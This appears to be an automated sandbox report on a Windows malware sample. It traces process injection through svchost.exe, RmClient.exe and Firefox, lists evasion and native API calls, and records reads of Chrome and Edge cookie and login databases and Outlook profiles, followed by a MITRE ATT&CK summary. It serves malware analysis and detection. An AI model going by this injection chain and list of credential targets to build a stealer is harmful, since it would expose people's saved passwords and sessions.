            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C69C0 mov eax, dword ptr fs:[00000030h] | 2_2_036C69C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036649D0 mov eax, dword ptr fs:[00000030h] | 2_2_036649D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FA9D3 mov eax, dword ptr fs:[00000030h] | 2_2_036FA9D3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] | 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] | 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] | 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] | 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] | 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] | 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] | 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] | 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] | 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] | 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] | 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] | 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] | 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036309AD mov eax, dword ptr fs:[00000030h] | 2_2_036309AD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036309AD mov eax, dword ptr fs:[00000030h] | 2_2_036309AD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B89B3 mov esi, dword ptr fs:[00000030h] | 2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h] | 2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h] | 2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h] | 2_2_036BE872
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h] | 2_2_036BE872
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h] | 2_2_036C6870
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h] | 2_2_036C6870
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03642840 mov ecx, dword ptr fs:[00000030h] | 2_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03660854 mov eax, dword ptr fs:[00000030h] | 2_2_03660854
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03634859 mov eax, dword ptr fs:[00000030h] | 2_2_03634859
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03634859 mov eax, dword ptr fs:[00000030h] | 2_2_03634859
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h] | 2_2_03652835
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h] | 2_2_03652835
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h] | 2_2_03652835
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, | 0_2_004238DA
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0041F250 SetUnhandledExceptionFilter, | 0_2_0041F250
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 0_2_0041A208
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtProtectVirtualMemory: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\RmClient.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: NULL target: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe protection: read write
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: NULL target: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RmClient.exe | Thread register set: target process: 3180
            Source: C:\Windows\SysWOW64\RmClient.exe | Thread APC queued: target process: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2DE5008
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00436CD7 LogonUserW, | 0_2_00436CD7
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, | 0_2_0040D590
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, | 0_2_00434418
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event, | 0_2_0043333C
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\enkJ6J7dAn.exe"
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | Process created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"
            Source: C:\Windows\SysWOW64\RmClient.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, | 0_2_00446124
            Source: avmjQSNkeFbUoa.exe, 00000003.00000000.2259788515.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589521835.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4589842860.00000000019A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
            Source: enkJ6J7dAn.exe, avmjQSNkeFbUoa.exe, 00000003.00000000.2259788515.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589521835.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4589842860.00000000019A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: avmjQSNkeFbUoa.exe, 00000003.00000000.2259788515.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589521835.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4589842860.00000000019A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: avmjQSNkeFbUoa.exe, 00000003.00000000.2259788515.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589521835.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4589842860.00000000019A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: enkJ6J7dAn.exe | Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW, | 0_2_004720DB
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00472C3F GetUserNameW, | 0_2_00472C3F
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache, | 0_2_0041E364
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, | 0_2_0040E500

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\RmClient.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\RmClient.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\RmClient.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\RmClient.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\RmClient.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\RmClient.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\RmClient.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\RmClient.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\RmClient.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: enkJ6J7dAn.exe | Binary or memory string: WIN_XP
            Source: enkJ6J7dAn.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: enkJ6J7dAn.exe | Binary or memory string: WIN_XPe
            Source: enkJ6J7dAn.exe | Binary or memory string: WIN_VISTA
            Source: enkJ6J7dAn.exe | Binary or memory string: WIN_7
            Source: enkJ6J7dAn.exe | Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, | 0_2_004652BE
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, | 0_2_00476619
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, | 0_2_0046CEF3
MITRE ATT&CK Matrix

Techniques matched by this sample's signatures, grouped by tactic. The number before each technique is the badge shown beside it in the report's matrix; matrix cells with no badge (the unmatched background of the full matrix) are omitted. No techniques were matched under Reconnaissance, Resource Development, Lateral Movement or Exfiltration.

Initial Access: 2 Valid Accounts
Execution: 2 Native API
Persistence: 1 DLL Side-Loading; 2 Valid Accounts
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 16 System Information Discovery; 141 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
